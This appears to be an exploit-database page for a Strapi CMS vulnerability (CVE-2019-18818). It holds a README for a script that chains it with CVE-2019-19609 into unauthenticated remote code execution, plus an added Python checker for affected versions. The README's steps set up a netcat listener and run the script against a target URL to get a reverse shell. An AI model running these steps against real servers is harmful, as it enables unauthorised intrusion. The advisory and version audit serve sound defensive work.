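Related vulnerability
Title: strapi authorization issue vulnerability (CVE-2019-18818)
Description: strapi is an open-source headless content management system (CMS). A security vulnerability exists in strapi versions before 3.0.0-beta.17.5. It stems from the program not correctly handling password resets in the files packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. No further information about this vulnerability is currently available; follow CNNVD or vendor announcements.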
Description
Exploit script showcasing a mixture of CVE-2019-18818 and CVE-2019-19609 for unauthenticated remote code execution in Strapi CMS.
Introduction
# Strapi-RCE
Exploit script showcasing a mixture of [CVE-2019-18818](https://www.exploit-db.com/exploits/50237) and [CVE-2019-19609](https://www.exploit-db.com/exploits/50238) for unauthenticated remote code execution in Strapi CMS.
## Exploit
This script exploits a vulnerability in Strapi CMS versions 3.0.0-beta.17.4 and lower, allowing for unauthenticated remote code execution.
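To check whether a deployment falls in the affected range, the version has to be compared using semver prerelease precedence, since every release in question is a `3.0.0-beta.*` build. The following is an added example, not code from this repository: it uses the fixed version 3.0.0-beta.17.5 given for CVE-2019-18818 in the vulnerability description on this page, assumes the `strapi` dependency in `package.json` is pinned to an exact version, and its helper names and sample manifest are constructed for illustration.

```python
import json
import re

# Fixed release stated on this page for CVE-2019-18818; earlier versions are affected.
FIXED = "3.0.0-beta.17.5"
_SEMVER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$")


def parse(version):
    """Split a semver string into (core tuple, list of prerelease identifiers)."""
    m = _SEMVER.match(version.strip().lstrip("^~=v"))
    if not m:
        raise ValueError(f"not a plain semver string: {version!r}")
    core = tuple(int(x) for x in m.group(1, 2, 3))
    pre = m.group(4).split(".") if m.group(4) else []
    return core, pre


def _ident_key(ident):
    # Numeric identifiers compare numerically and sort below alphanumeric ones.
    return (0, int(ident), "") if ident.isdigit() else (1, 0, ident)


def precedes(a, b):
    """True if version a has lower semver precedence than version b."""
    (core_a, pre_a), (core_b, pre_b) = parse(a), parse(b)
    if core_a != core_b:
        return core_a < core_b
    if not pre_a or not pre_b:
        # A prerelease sorts before the plain release with the same core.
        return bool(pre_a) and not pre_b
    # List comparison: identifier by identifier, a shorter prefix sorts first.
    return [_ident_key(i) for i in pre_a] < [_ident_key(i) for i in pre_b]


def is_affected(version):
    return precedes(version, FIXED)


def audit_manifest(manifest_text):
    """Return (declared version, affected?) for the strapi dependency, or None."""
    spec = json.loads(manifest_text).get("dependencies", {}).get("strapi")
    return None if spec is None else (spec, is_affected(spec))


# Constructed sample package.json, for illustration only.
SAMPLE = '{"name": "demo-cms", "dependencies": {"strapi": "3.0.0-beta.17.4"}}'

if __name__ == "__main__":
    print(audit_manifest(SAMPLE))
```

A naive string comparison would rank `3.0.0-beta.9` above `3.0.0-beta.17.5`; comparing identifiers numerically avoids that false negative.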
## Description
The exploit works by first leveraging a password reset vulnerability to obtain a JSON Web Token (JWT) for an administrative user. This token is then used to send a malicious payload to the Strapi CMS, which triggers a reverse shell back to the attacker's machine.
## How to Use
1. **Clone the Repository:**
```sh
git clone https://github.com/Hackhoven/Strapi-RCE.git
```
2. **Navigate to the directory**
```sh
cd Strapi-RCE/
```
3. **Set up a Netcat Listener**
```sh
nc -nlvp <LPORT>
```
4. **Run the script with the target URL, local host IP address, and local host port as arguments**
```sh
python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
```
## Disclaimer
This script is intended for educational purposes only. The author does not condone or support the use of this script for illegal or unethical activities. This script should only be used in legal security research or CTF environments. Use at your own risk.
---
Made by [Hackhoven](https://github.com/Hakchoven)
File snapshot
[4.0K] /data/pocs/617fae2aa6966ff2d7f93b15513506c581f940b2
├── [1.4K] README.md
└── [2.3K] strapi-rce.py
0 directories, 2 files